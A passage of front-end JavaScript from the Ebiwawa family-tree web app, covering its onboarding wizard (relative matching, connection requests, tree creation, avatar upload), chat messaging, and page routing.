            saveOnboardingProgress();
            // Advance to Step 3 (which will now render the relationship picker).
            nextOnboardingStep();
        }

        function skipTreeSearch() {
            onboardingState.data.skipTreeSearch = true;
            onboardingState.data.selectedTreeId = null;
            nextOnboardingStep();
        }

        // B26: when the user types a parent's name in Step 3 (own-tree path),
        // check if a User with that name already exists on the platform. If so,
        // surface an inline suggestion to send a connection request. The Person
        // record gets created from the form data regardless of whether the user
        // accepts the suggestion — the connection-request is a separate
        // optional action.
        const _relativeLookupInflight = { mother: false, father: false };
        async function lookupRelativeOnPlatform(role) {
            const firstInput = document.getElementById(`onboard-${role}-first-name`);
            const lastInput = document.getElementById(`onboard-${role}-last-name`);
            const suggestBox = document.getElementById(`onboard-${role}-suggest`);
            if (!firstInput || !lastInput || !suggestBox) return;

            const first = (firstInput.value || '').trim();
            const last = (lastInput.value || '').trim();
            if (first.length < 2 || last.length < 2) {
                suggestBox.classList.add('hidden');
                suggestBox.innerHTML = '';
                return;
            }
            if (_relativeLookupInflight[role]) return;
            _relativeLookupInflight[role] = true;

            try {
                const url = `${API_BASE_URL}/users/match?firstName=${encodeURIComponent(first)}&lastName=${encodeURIComponent(last)}`;
                const response = await apiFetch(url);
                const matches = response?.matches || [];
                if (matches.length === 0) {
                    suggestBox.classList.add('hidden');
                    suggestBox.innerHTML = '';
                    return;
                }
                const m = matches[0]; // surface the top match; multiples are rare
                const fullName = [m.firstName, m.lastName].filter(Boolean).join(' ');
                const roleLabel = role === 'mother' ? 'your mother' : 'your father';
                suggestBox.innerHTML = `
                    <div class="p-3 bg-blue-50 border border-blue-200 rounded text-sm flex items-center justify-between gap-3 flex-wrap">
                        <span class="text-blue-900">
                            <strong>${escapeHtml(fullName)}</strong> is already on Ebiwawa. Send ${escapeHtml(roleLabel)} a connection request now?
                        </span>
                        <div class="flex gap-2 flex-shrink-0">
                            <button type="button"
                                    onclick="sendRelativeConnectionRequest('${role}', ${m.userId}, this)"
                                    class="px-3 py-1.5 bg-primary text-white rounded-md text-sm font-medium hover:bg-opacity-90 whitespace-nowrap">
                                Send request
                            </button>
                            <button type="button"
                                    onclick="dismissRelativeSuggestion('${role}')"
                                    class="px-3 py-1.5 bg-white border border-gray-300 text-gray-700 rounded-md text-sm hover:bg-gray-50">
                                Not now
                            </button>
                        </div>
                    </div>
                `;
                suggestBox.classList.remove('hidden');
            } catch (e) {
                console.warn('lookupRelativeOnPlatform failed:', e);
                suggestBox.classList.add('hidden');
                suggestBox.innerHTML = '';
            } finally {
                _relativeLookupInflight[role] = false;
            }
        }

        async function sendRelativeConnectionRequest(role, toUserId, btn) {
            btn.disabled = true;
            btn.textContent = 'Sending...';
            try {
                await apiFetch(`${API_BASE_URL}/connection-requests`, {
                    method: 'POST',
                    body: {
                        toUserId,
                        relationshipType: 'parent',
                        message: null,
                    },
                });
                const suggestBox = document.getElementById(`onboard-${role}-suggest`);
                if (suggestBox) {
                    suggestBox.innerHTML = `
                        <p class="text-sm text-green-800 bg-green-50 border border-green-200 rounded p-3">
                            ✓ Connection request sent. You'll be notified when they accept.
                        </p>
                    `;
                }
            } catch (e) {
                btn.disabled = false;
                btn.textContent = 'Send request';
                alert(e.message || 'Could not send the request right now. Please try again.');
            }
        }

        function dismissRelativeSuggestion(role) {
            const suggestBox = document.getElementById(`onboard-${role}-suggest`);
            if (suggestBox) {
                suggestBox.classList.add('hidden');
                suggestBox.innerHTML = '';
            }
        }

        function useDefaultTreeName() {
            const treeNameInput = document.getElementById('onboard-tree-name');
            const lastName = onboardingState.data.userLastName || 'Family';
            const defaultName = `The ${lastName} Family`;
            if (treeNameInput) {
                treeNameInput.value = defaultName;
                onboardingState.data.treeName = defaultName;
            }
        }

        // Called when /onboarding/complete returns 409 (tree name collision).
        // The chip strip is rendered at the wizard level (#tree-name-alternatives
        // below the nav buttons) so it's visible regardless of which step the
        // user clicked Complete from. The Step-3 tree-name input may or may not
        // be in the DOM at this moment — pickTreeNameAlternative handles both.
        function renderTreeNameAlternatives(message, alternatives) {
            const container = document.getElementById('tree-name-alternatives');
            if (!container) return;
            container.innerHTML = `
                <div class="p-3 bg-yellow-50 border border-yellow-200 rounded-md">
                    <p class="text-sm text-yellow-900 mb-2">${escapeHtml(message || 'That tree name is already in use.')} Pick a different name, then click <strong>Complete</strong> again:</p>
                    <div class="flex flex-wrap gap-2">
                        ${alternatives.map(alt => `
                            <button type="button"
                                    onclick="pickTreeNameAlternative(this)"
                                    data-name="${escapeHtml(alt)}"
                                    class="px-3 py-1.5 bg-white border border-yellow-300 rounded-full text-sm hover:bg-yellow-100 hover:border-yellow-400">
                                ${escapeHtml(alt)}
                            </button>
                        `).join('')}
                    </div>
                    <p id="tree-name-alternatives-confirm" class="text-xs text-yellow-900 mt-2 hidden"></p>
                </div>
            `;
            container.classList.remove('hidden');
        }

        function pickTreeNameAlternative(btn) {
            const name = btn.dataset.name || '';
            onboardingState.data.treeName = name;
            // If we're on Step 3 (the input is in the DOM), update the input too
            // so the user sees the new value if they navigate back.
            const treeNameInput = document.getElementById('onboard-tree-name');
            if (treeNameInput) {
                treeNameInput.value = name;
            }
            // Inline confirmation so the user knows the pick registered.
            const confirm = document.getElementById('tree-name-alternatives-confirm');
            if (confirm) {
                confirm.innerHTML = `New tree name: <strong>${escapeHtml(name)}</strong>. Click Complete to continue.`;
                confirm.classList.remove('hidden');
            }
        }

        async function completeOnboarding() {
            const errorDiv = document.getElementById('onboarding-error');
            const nextBtn = document.getElementById('next-btn');

            try {
                nextBtn.disabled = true;
                nextBtn.textContent = onboardingState.data.selectedTreeId ? 'Sending request...' : 'Creating your tree...';

                // Get current Firebase user and token
                const currentUser = auth.currentUser;
                if (!currentUser) {
                    throw new Error("Authentication error. Please restart onboarding.");
                }

                // Get fresh auth token
                const authToken = await currentUser.getIdToken();

                // Build full name
                const fullName = [
                    onboardingState.data.userFirstName,
                    onboardingState.data.userMiddleName,
                    onboardingState.data.userLastName
                ].filter(Boolean).join(' ');

                // Format locations
                const userBirthPlace = formatLocation(
                    onboardingState.data.birthCity,
                    onboardingState.data.birthTown,
                    onboardingState.data.birthState,
                    COUNTRIES.find(c => c.code === onboardingState.data.birthCountry)?.name || ''
                );

                const userCurrentLocation = formatLocation(
                    onboardingState.data.currentCity,
                    onboardingState.data.currentTown,
                    onboardingState.data.currentState,
                    COUNTRIES.find(c => c.code === onboardingState.data.currentCountry)?.name || ''
                );

                // ───────────────── Q5 INVITED-USER PATH ─────────────────
                // User signed up via /signup?invite=TOKEN; /invites/accept has
                // already added them as a MANAGES member of the inviter's tree.
                // We don't create a tree and don't send a connection-request —
                // just persist their profile and mark onboardingCompleted.
                if (onboardingState.joinedExistingTree) {
                    const userBirthDate = onboardingState.data.birthYear
                        ? `${onboardingState.data.birthYear}-${String(onboardingState.data.birthMonth || 1).padStart(2, '0')}-${String(onboardingState.data.birthDay || 1).padStart(2, '0')}`
                        : null;

                    await apiFetch(`${API_BASE_URL}/onboarding/skip-to-pending`, {
                        method: 'POST',
                        body: {
                            userName: fullName,
                            userFirstName: onboardingState.data.userFirstName,
                            userMiddleName: onboardingState.data.userMiddleName || '',
                            userLastName: onboardingState.data.userLastName,
                            userBirthDate,
                            // B44 follow-up: also send DOB as integers so the
                            // backend can land them on the Person stub created
                            // by /invites/accept. Without these, the Person's
                            // birth_year/month/day stay null after onboarding,
                            // GET /me's fallback returns nothing, and the My
                            // Profile form opens empty even though the wizard
                            // collected the data.
                            userBirthYear: onboardingState.data.birthYear ? parseInt(onboardingState.data.birthYear, 10) : null,
                            userBirthMonth: onboardingState.data.birthMonth ? parseInt(onboardingState.data.birthMonth, 10) : null,
                            userBirthDay: onboardingState.data.birthDay ? parseInt(onboardingState.data.birthDay, 10) : null,
                            userBirthPlace,
                            userCurrentLocation,
                            userGender: onboardingState.data.gender,
                            privacyMode: onboardingState.data.privacyMode,
                        },
                    });

                    if (onboardingState.data.profileAvatarType === 'upload' && onboardingState.data.profilePicture) {
                        await uploadAvatar(authToken);
                    } else if (onboardingState.data.profileAvatarType === 'dicebear') {
                        await uploadDiceBearAvatar(authToken);
                    }

                    if (onboardingState.data.userRole) {
                        await saveUserPreference('role', onboardingState.data.userRole, authToken);
                    }

                    clearOnboardingProgress();
                    localStorage.setItem('bustUserCache', 'true');
                    window.location.reload();
                    return;
                }

                // ───────────────── JOIN PATH ─────────────────
                // The user picked an existing tree to join (selectTreeToJoin at
                // Step 2). Send the connection-request now with the relationshipType
                // collected at Step 3, then finalize via /onboarding/skip-to-pending.
                if (onboardingState.data.selectedTreeId) {
                    const userBirthDate = onboardingState.data.birthYear
                        ? `${onboardingState.data.birthYear}-${String(onboardingState.data.birthMonth || 1).padStart(2, '0')}-${String(onboardingState.data.birthDay || 1).padStart(2, '0')}`
                        : null;

                    await apiFetch(`${API_BASE_URL}/connection-requests`, {
                        method: 'POST',
                        body: {
                            toUserId: onboardingState.data.selectedTreeOwnerId,
                            relationshipType: onboardingState.data.joinRelationship || null,
                            message: onboardingState.data.joinMessage || null,
                        },
                    });

                    const skipPayload = {
                        userName: fullName,
                        userFirstName: onboardingState.data.userFirstName,
                        userMiddleName: onboardingState.data.userMiddleName || '',
                        userLastName: onboardingState.data.userLastName,
                        userBirthDate,
                        userBirthPlace,
                        userCurrentLocation,
                        userGender: onboardingState.data.gender,
                        privacyMode: onboardingState.data.privacyMode,
                    };

                    const skipResponse = await fetch(`${API_BASE_URL}/onboarding/skip-to-pending`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                            'Authorization': `Bearer ${authToken}`,
                        },
                        body: JSON.stringify(skipPayload),
                    });
                    if (!skipResponse.ok) {
                        const err = await skipResponse.json().catch(() => ({}));
                        throw new Error(err.error || 'Failed to finalize onboarding');
                    }

                    // Save self-role if collected
                    if (onboardingState.data.userRole) {
                        await saveUserPreference('role', onboardingState.data.userRole, authToken).catch(() => {});
                    }

                    clearOnboardingProgress();
                    localStorage.setItem('bustUserCache', 'true');
                    window.location.reload();
                    return;
                }

                // ───────────────── OWN-TREE PATH ─────────────────
                // No tree selected — user is creating their own. Continue with
                // the existing /onboarding/complete flow.

                // Auto-generate tree name if not provided
                const treeName = onboardingState.data.treeName ||
                    `The ${onboardingState.data.userLastName} Family`;

                // Format birth date
                const userBirthDate = `${onboardingState.data.birthYear}-${String(onboardingState.data.birthMonth).padStart(2, '0')}-${String(onboardingState.data.birthDay).padStart(2, '0')}`;

                // Prepare payload
                const payload = {
                    userName: fullName,
                    userFirstName: onboardingState.data.userFirstName,
                    userMiddleName: onboardingState.data.userMiddleName || '',
                    userLastName: onboardingState.data.userLastName,
                    userBirthYear: parseInt(onboardingState.data.birthYear),
                    userBirthMonth: parseInt(onboardingState.data.birthMonth),
                    userBirthDay: parseInt(onboardingState.data.birthDay),
                    userBirthDate: userBirthDate,
                    userBirthPlace: userBirthPlace,
                    userCurrentLocation: userCurrentLocation,
                    userGender: onboardingState.data.gender,
                    treeName: treeName,
                    motherFirstName: onboardingState.data.motherFirstName || null,
                    motherLastName: onboardingState.data.motherLastName || null,
                    motherMaidenName: onboardingState.data.motherLastName || null,
                    fatherFirstName: onboardingState.data.fatherFirstName || null,
                    fatherLastName: onboardingState.data.fatherLastName || null,
                    privacyMode: onboardingState.data.privacyMode,
                };

                console.log('Submitting onboarding data:', payload);

                // Submit to backend
                const response = await fetch(`${API_BASE_URL}/onboarding/complete`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'Authorization': `Bearer ${authToken}`
                    },
                    body: JSON.stringify(payload)
                });

                if (!response.ok) {
                    const errorData = await response.json().catch(() => ({}));
                    // Tree name collision: surface alternative names as chips at
                    // the wizard level (visible on any step). Click a chip ->
                    // updates onboardingState.data.treeName -> Complete uses the
                    // new name on retry.
                    if (response.status === 409 && Array.isArray(errorData.alternatives)) {
                        renderTreeNameAlternatives(errorData.message, errorData.alternatives);
                        nextBtn.disabled = false;
                        nextBtn.textContent = 'Complete ✓';
                        document.getElementById('tree-name-alternatives')?.scrollIntoView({ behavior: 'smooth', block: 'center' });
                        return;
                    }
                    // 2026-10-11: specific handling for 429 daily_cap_reached
                    // from ensure_neo4j_user_exists's counter check (Session 1.5
                    // Chunk D2). Fires on the public (gate-off, post-2026-10-26)
                    // own-tree signup path when MAX_NEW_USERS_PER_DAY is hit.
                    // Preserve onboardingState so user doesn't lose their wizard
                    // input; show friendly message; re-enable button for tomorrow
                    // retry. Don't delete the Firebase account — unlike the
                    // handleSignup/invites/accept 429 case, the user HAS reached
                    // the end of signup+wizard legitimately; next day's retry
                    // can reuse the Firebase credentials to re-enter the wizard
                    // from where they left off.
                    if (response.status === 429 && errorData.reason === 'daily_cap_reached') {
                        if (errorDiv) {
                            errorDiv.textContent = errorData.error || "We've hit today's signup limit. Please try again tomorrow.";
                        }
                        nextBtn.disabled = false;
                        nextBtn.textContent = 'Complete ✓';
                        return;
                    }
                    throw new Error(errorData.error || 'Failed to complete onboarding');
                }

                const result = await response.json();
                console.log('Onboarding completed:', result);

                // Upload avatar if provided
                if (onboardingState.data.profileAvatarType === 'upload' && onboardingState.data.profilePicture) {
                    await uploadAvatar(authToken);
                } else if (onboardingState.data.profileAvatarType === 'dicebear') {
                    await uploadDiceBearAvatar(authToken);
                }

                // Save user role preference
                if (onboardingState.data.userRole) {
                    await saveUserPreference('role', onboardingState.data.userRole, authToken);
                }

                // Clear progress
                clearOnboardingProgress();

                // Clear previous modal flag and set new flag for post-onboarding modal
                localStorage.removeItem('profileCompletionModalShown');
                localStorage.setItem('showProfileCompletionModal', 'true');

                // Set flag to bust cache on next load
                localStorage.setItem('bustUserCache', 'true');

                // Reload to get new user state
                window.location.reload();

            } catch (error) {
                errorDiv.textContent = error.message || "Failed to complete onboarding. Please try again.";
                console.error('Complete onboarding error:', error);
                nextBtn.disabled = false;
                nextBtn.textContent = 'Complete ✓';
            }
        }

        // Used when the user chose "Request to Join" an existing tree during
        // onboarding. Finalizes their User node with the Step-1 data but does
        // NOT create their own tree. They'll land on a WaitingScreen until the
        // accepter approves the request.
        async function skipToPendingOnboarding() {
            const errorDiv = document.getElementById('onboarding-error');
            try {
                const currentUser = auth.currentUser;
                if (!currentUser) {
                    throw new Error("Authentication error. Please restart onboarding.");
                }
                const authToken = await currentUser.getIdToken();

                const fullName = [
                    onboardingState.data.userFirstName,
                    onboardingState.data.userMiddleName,
                    onboardingState.data.userLastName
                ].filter(Boolean).join(' ');

                const userBirthPlace = formatLocation(
                    onboardingState.data.birthCity,
                    onboardingState.data.birthTown,
                    onboardingState.data.birthState,
                    COUNTRIES.find(c => c.code === onboardingState.data.birthCountry)?.name || ''
                );
                const userCurrentLocation = formatLocation(
                    onboardingState.data.currentCity,
                    onboardingState.data.currentTown,
                    onboardingState.data.currentState,
                    COUNTRIES.find(c => c.code === onboardingState.data.currentCountry)?.name || ''
                );

                const userBirthDate = onboardingState.data.birthYear
                    ? `${onboardingState.data.birthYear}-${String(onboardingState.data.birthMonth || 1).padStart(2, '0')}-${String(onboardingState.data.birthDay || 1).padStart(2, '0')}`
                    : null;

                const payload = {
                    userName: fullName,
                    userFirstName: onboardingState.data.userFirstName,
                    userLastName: onboardingState.data.userLastName,
                    userMiddleName: onboardingState.data.userMiddleName || '',
                    userBirthDate,
                    userBirthPlace,
                    userCurrentLocation,
                    userGender: onboardingState.data.gender,
                };

                const response = await fetch(`${API_BASE_URL}/onboarding/skip-to-pending`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'Authorization': `Bearer ${authToken}`,
                    },
                    body: JSON.stringify(payload),
                });

                if (!response.ok) {
                    const errorData = await response.json();
                    throw new Error(errorData.error || 'Failed to finalize onboarding');
                }

                clearOnboardingProgress();
                localStorage.setItem('bustUserCache', 'true');
                window.location.reload();

            } catch (error) {
                if (errorDiv) {
                    errorDiv.textContent = error.message || "Failed to finalize onboarding. Please try again.";
                }
                console.error('skipToPendingOnboarding error:', error);
            }
        }

        async function uploadAvatar(authToken) {
            try {
                const formData = new FormData();
                formData.append('avatar', onboardingState.data.profilePicture);

                const response = await fetch(`${API_BASE_URL}/me/avatar`, {
                    method: 'POST',
                    headers: {
                        'Authorization': `Bearer ${authToken}`
                    },
                    body: formData
                });

                if (!response.ok) {
                    console.error('Avatar upload failed');
                }
            } catch (error) {
                console.error('Avatar upload error:', error);
            }
        }

        async function uploadDiceBearAvatar(authToken) {
            try {
                const avatarUrl = generateDiceBearAvatarUrl(onboardingState.data.profileAvatarSeed, 'avataaars', onboardingState.data.profileAvatarSkin);
                const svgResponse = await fetch(avatarUrl);
                const svgBlob = await svgResponse.blob();

                const file = new File([svgBlob], 'avatar.svg', { type: 'image/svg+xml' });

                const formData = new FormData();
                formData.append('avatar', file);

                const response = await fetch(`${API_BASE_URL}/me/avatar`, {
                    method: 'POST',
                    headers: {
                        'Authorization': `Bearer ${authToken}`
                    },
                    body: formData
                });

                if (!response.ok) {
                    console.error('DiceBear avatar upload failed');
                }
            } catch (error) {
                console.error('DiceBear avatar upload error:', error);
            }
        }

        async function saveUserPreference(key, value, authToken) {
            try {
                await fetch(`${API_BASE_URL}/me/preferences`, {
                    method: 'PUT',
                    headers: {
                        'Content-Type': 'application/json',
                        'Authorization': `Bearer ${authToken}`
                    },
                    body: JSON.stringify({ [key]: value })
                });
            } catch (error) {
                console.error('Save user preference error:', error);
            }
        }

        function startOnboarding() {
            // Check for saved progress
            if (loadOnboardingProgress()) {
                console.log('Resuming onboarding from step', onboardingState.currentStep);
            } else {
                onboardingState.currentStep = 1;
            }
            renderOnboardingStep(onboardingState.currentStep);
            updateProgress();
        }

        async function handleSendMessage(event) {
            event.preventDefault();
            const input = document.getElementById('message-input');
            const fileInput = document.getElementById('message-file-input');
            const text = input.value.trim();
            const file = fileInput?.files[0];

            if (!text && !file) return;
            if (!appState.selectedConversationId) return;

            input.value = '';
            const sendButton = event.target.querySelector('button[type="submit"]');
            if (sendButton) {
                sendButton.disabled = true;
                sendButton.textContent = 'Sending...';
            }

            try {
                const messageData = {
                    senderId: appState.currentUserNeo4jId,
                    text: text || (file ? '' : 'File')
                };

                // Upload file if attached
                if (file) {
                    const signedUrlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-upload-url`, {
                        method: 'POST',
                        body: { filename: `chat/${Date.now()}_${file.name}` }
                    });

                    await fetch(signedUrlResponse.signed_url, {
                        method: 'PUT',
                        body: file,
                        headers: { 'Content-Type': file.type }
                    });

                    messageData.fileUrl = signedUrlResponse.public_url;
                    messageData.fileName = file.name;
                    messageData.fileType = file.type;
                }

                await apiFetch(`${API_BASE_URL}/conversations/${appState.selectedConversationId}/messages`, {
                    method: 'POST',
                    body: messageData
                });

                // Session 2c Task 3: haptic punctuation on message-send success.
                if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();

                // Clear file selection
                if (fileInput) {
                    fileInput.value = '';
                    clearFileSelection();
                }
            } catch (error) {
                console.error('Error sending message:', error);
                input.value = text;
                alert("Failed to send message.");
            } finally {
                if (sendButton) {
                    sendButton.disabled = false;
                    sendButton.textContent = 'Send';
                }
            }
        }

        // File handling functions
        function setupFilePreview() {
            const fileInput = document.getElementById('message-file-input');
            if (fileInput) {
                fileInput.addEventListener('change', (e) => {
                    const file = e.target.files[0];
                    if (file) {
                        const preview = document.getElementById('file-preview');
                        const fileName = document.getElementById('file-name');
                        if (preview && fileName) {
                            fileName.textContent = file.name;
                            preview.classList.remove('hidden');
                        }
                    }
                });
            }
        }

        function clearFileSelection() {
            const fileInput = document.getElementById('message-file-input');
            const preview = document.getElementById('file-preview');
            if (fileInput) fileInput.value = '';
            if (preview) preview.classList.add('hidden');
        }

        async function archiveConversation(conversationId) {
            if (!confirm('Archive this conversation?')) return;

            try {
                await apiFetch(`${API_BASE_URL}/conversations/${conversationId}/archive`, { method: 'POST' });
                appState.conversations = appState.conversations.filter(c => c.id !== conversationId);
                document.getElementById('message-view').innerHTML = '<div class="flex items-center justify-center h-full"><p class="text-text-secondary">Select a conversation.</p></div>';
                await fetchAndRenderConversations();
            } catch (error) {
                console.error('Error archiving conversation:', error);
                alert('Failed to archive conversation');
            }
        }

        async function deleteConversation(conversationId) {
            if (!confirm('Delete this conversation? This cannot be undone.')) return;

            try {
                await apiFetch(`${API_BASE_URL}/conversations/${conversationId}`, { method: 'DELETE' });
                appState.conversations = appState.conversations.filter(c => c.id !== conversationId);
                document.getElementById('message-view').innerHTML = '<div class="flex items-center justify-center h-full"><p class="text-text-secondary">Select a conversation.</p></div>';
                await fetchAndRenderConversations();
            } catch (error) {
                console.error('Error deleting conversation:', error);
                alert('Failed to delete conversation');
            }
        }

        async function handleNewMessage(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('new-message-error');
            if (errorDiv) errorDiv.textContent = '';

            try {
                const firstMessage = document.getElementById('first-message').value.trim();

                if (!firstMessage) {
                    throw new Error("Please enter a message");
                }

                // Check if we're creating a group or direct conversation
                const isGroupChat = document.getElementById('group-chat-fields').classList.contains('hidden') === false;
                let conversationId;

                if (isGroupChat) {
                    // Group chat: get selected participants
                    const checkboxes = document.querySelectorAll('input[name="group-participants"]:checked');
                    const participants = Array.from(checkboxes).map(cb => parseInt(cb.value));
                    const groupName = document.getElementById('group-name').value.trim();

                    if (participants.length < 2) {
                        throw new Error("Please select at least 2 participants for a group chat");
                    }

                    // Create group conversation
                    const convoResponse = await apiFetch(`${API_BASE_URL}/conversations/groups`, {
                        method: 'POST',
                        body: {
                            participants: participants,
                            name: groupName || undefined
                        }
                    });

                    conversationId = convoResponse.conversationId;

                } else {
                    // Direct message: get single recipient
                    const recipientId = parseInt(document.getElementById('message-recipient').value);

                    if (!recipientId) {
                        throw new Error("Please select a recipient");
                    }

                    // Create direct conversation
                    const convoResponse = await apiFetch(`${API_BASE_URL}/conversations`, {
                        method: 'POST',
                        body: {
                            user1_id: appState.currentUserNeo4jId,
                            user2_id: recipientId
                        }
                    });

                    conversationId = convoResponse.conversationId;
                }

                // Send first message
                await apiFetch(`${API_BASE_URL}/conversations/${conversationId}/messages`, {
                    method: 'POST',
                    body: {
                        senderId: appState.currentUserNeo4jId,
                        text: firstMessage
                    }
                });

                // Close modal and refresh conversations
                closeModal('new-message-modal');
                fetchAndRenderConversations();

                // Select the new conversation
                appState.selectedConversationId = conversationId;

            } catch (error) {
                if (errorDiv) {
                    errorDiv.textContent = error.message || "Failed to send message. Please try again.";
                } else {
                    alert(error.message || "Failed to send message. Please try again.");
                }
            }
        }

        function toggleChatType(type) {
            const directFields = document.getElementById('direct-message-fields');
            const groupFields = document.getElementById('group-chat-fields');
            const directBtn = document.getElementById('direct-chat-btn');
            const groupBtn = document.getElementById('group-chat-btn');

            if (type === 'direct') {
                // Show direct message fields
                directFields.classList.remove('hidden');
                groupFields.classList.add('hidden');

                // Update button styles
                directBtn.classList.add('bg-primary', 'text-white');
                directBtn.classList.remove('text-gray-600', 'hover:bg-gray-100');
                groupBtn.classList.remove('bg-primary', 'text-white');
                groupBtn.classList.add('text-gray-600', 'hover:bg-gray-100');

                // Make recipient required, group fields not required
                document.getElementById('message-recipient').required = true;
            } else {
                // Show group chat fields
                directFields.classList.add('hidden');
                groupFields.classList.remove('hidden');

                // Update button styles
                groupBtn.classList.add('bg-primary', 'text-white');
                groupBtn.classList.remove('text-gray-600', 'hover:bg-gray-100');
                directBtn.classList.remove('bg-primary', 'text-white');
                directBtn.classList.add('text-gray-600', 'hover:bg-gray-100');

                // Make recipient not required
                document.getElementById('message-recipient').required = false;
            }
        }

        // --- RENDER & INITIALIZATION ---
        function renderApp() {
            const appContainer = document.getElementById('app');

            // Session 2b: dismiss the native splash after the first frame of
            // real content paints. Idempotent (no-ops after first call), so
            // firing on every renderApp is safe + covers every code path
            // (multiple early-returns inside renderApp).
            requestAnimationFrame(() => dismissSplashOnReady());

            // Custom Firebase Auth action handler. Routes /auth/action?mode=...
            // here regardless of authentication state — the user clicking a
            // password-reset or verify-email link is signed out by definition.
            // Dispatch on mode; unknown modes fall through to a generic "link
            // can't be used" page rendered by AuthActionPage.
            const _path = window.location.pathname;
            if (_path === '/auth/action') {
                const params = new URLSearchParams(window.location.search);
                const mode = params.get('mode');
                const oobCode = params.get('oobCode');
                appContainer.innerHTML = AuthActionPage({ mode, oobCode });
                if (mode === 'resetPassword' && oobCode) {
                    initResetPasswordPage(oobCode);
                } else if (mode === 'verifyEmail' && oobCode) {
                    initVerifyEmailPage(oobCode);
                }
                return;
            }

            // Phase A apex prep (item 16):
            // /login — explicit auth surface. Signed-out users see AuthPage;
            // signed-in users get rerouted to / (which will land them on
            // their dashboard via the existing logic below).
            if (_path === '/login') {
                if (!appState.isAuthenticated) {
                    appContainer.innerHTML = AuthPage();
                    const loginForm = document.getElementById('login-form');
                    const signupForm = document.getElementById('signup-form');
                    if (loginForm) loginForm.addEventListener('submit', handleLogin);
                    if (signupForm) signupForm.addEventListener('submit', handleSignup);
                    // Item 16 Phase A: ?form=signup arrives from the
                    // Landing's "Get started" CTA. Swap to the signup
                    // form via the existing switchAuthTab path. Defer to
                    // next tick so the DOM is in place.
                    const _q = new URLSearchParams(window.location.search);
                    if (_q.get('form') === 'signup') {
                        setTimeout(() => {
                            try { switchAuthTab('signup'); } catch (e) { console.warn('switchAuthTab(signup) failed', e); }
                        }, 0);
                    }
                    return;
                }
                // Signed in but hit /login: rewrite to / and fall through.
                window.history.replaceState({}, '', '/');
            }

            // Q5: /signup?invite=TOKEN — the canonical share URL minted by
            // POST /invites. Auto-opens the signup tab; banner / pill state
            // is derived inside switchAuthTab → applyInviteState so it's
            // consistent across all entry paths (/signup, /login?form=signup,
            // manual tab click).
            if (_path === '/signup') {
                if (!appState.isAuthenticated) {
                    appContainer.innerHTML = AuthPage();
                    const loginForm = document.getElementById('login-form');
                    const signupForm = document.getElementById('signup-form');
                    if (loginForm) loginForm.addEventListener('submit', handleLogin);
                    if (signupForm) signupForm.addEventListener('submit', handleSignup);
                    setTimeout(() => {
                        try { switchAuthTab('signup'); } catch (e) { console.warn('switchAuthTab(signup) failed', e); }
                    }, 0);
                    return;
                }
                // Signed in already + invite token → existing acceptance UI.
                // Q5: same short-circuit as the auth-state handler — don't
                // re-overlay during/after handleSignup's invite consumption.
                const inviteToken = getInviteCodeFromUrl();
                if (inviteToken && !pendingInvite && !onboardingState.joinedExistingTree) {
                    // Reuse the existing signed-in acceptance overlay.
                    // showInviteAcceptanceUI reads ?token= so mirror the param.
                    const url = new URL(window.location);
                    url.searchParams.set('token', inviteToken);
                    window.history.replaceState({}, '', url);
                    showInviteAcceptanceUI({ inviterName: 'A family member', treeName: 'their family tree' });
                    return;
                }
                window.history.replaceState({}, '', '/');
            }

            // Phase A apex prep:
            // / (root) + signed-out → Landing placeholder. Signed-in flow
            // unchanged — falls through to the existing dashboard branches.
            const _isRoot = _path === '/' || _path === '';
            if (_isRoot && !appState.isAuthenticated) {
                appContainer.innerHTML = Landing();
                // Bot protection: stamp render time so the waitlist submit
                // can prove the form was open for >2s before submit. Bots
                // that auto-submit will fail the timing gate.
                window._ebwLandingRenderedAt = Date.now();
                return;
            }

            // Show auth page if not authenticated
            if (!appState.isAuthenticated) {
                appContainer.innerHTML = AuthPage();

                // Attach auth form listeners
                const loginForm = document.getElementById('login-form');
                const signupForm = document.getElementById('signup-form');

                if (loginForm) {
                    loginForm.addEventListener('submit', handleLogin);
                }

                if (signupForm) {
                    signupForm.addEventListener('submit', handleSignup);
                }
                return;
            }

            // Navigate to appropriate view based on whether user has a tree
            if (appState.hasTree) {
                // Show dashboard if user has tree
                appContainer.innerHTML = DashboardPage(appState.currentUser);
                document.getElementById('quick-upload-input')?.addEventListener('change', handleQuickUploadSubmit);

                // Add profile completion modal to DOM
                const modalHTML = `
                    <div id="profile-completion-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                        <div class="w-full max-w-2xl p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                            <h2 class="text-2xl font-bold text-gray-800">Your family tree is growing! 🌱</h2>
                            <p class="text-gray-600">You've created your foundation! Now let's add the rich details that make your legacy unique.</p>

                            <!-- Progress Bar -->
                            <div class="bg-gray-200 rounded-full h-3 mb-4">
                                <div class="bg-primary h-3 rounded-full" style="width: 45%"></div>
                            </div>
                            <p class="text-sm text-gray-600 text-center mb-6">Profile Completion: 45%</p>

                            <!-- Quick Actions -->
                            <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                <div onclick="navigateToProfileFromModal('profile-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                    <h3 class="font-semibold text-gray-800 mb-2">Add Your Heritage</h3>
                                    <p class="text-sm text-gray-600">Share your ethnic group(s) and tribal identity</p>
                                </div>
                                <div onclick="navigateToProfileFromModal('profile-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                    <h3 class="font-semibold text-gray-800 mb-2">Share Your Story</h3>
                                    <p class="text-sm text-gray-600">Write a brief introduction about yourself</p>
                                </div>
                                <div onclick="navigateToProfileFromModal('profile-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
                                    <h3 class="font-semibold text-gray-800 mb-2">Tell Us More</h3>
                                    <p class="text-sm text-gray-600">Add hometown, languages, and family role</p>
                                </div>
                                <div onclick="navigateToProfileFromModal('family-tree-view')" class="p-4 border border-gray-200 rounded-lg hover:border-primary hover:shadow-md transition-all cursor-pointer">
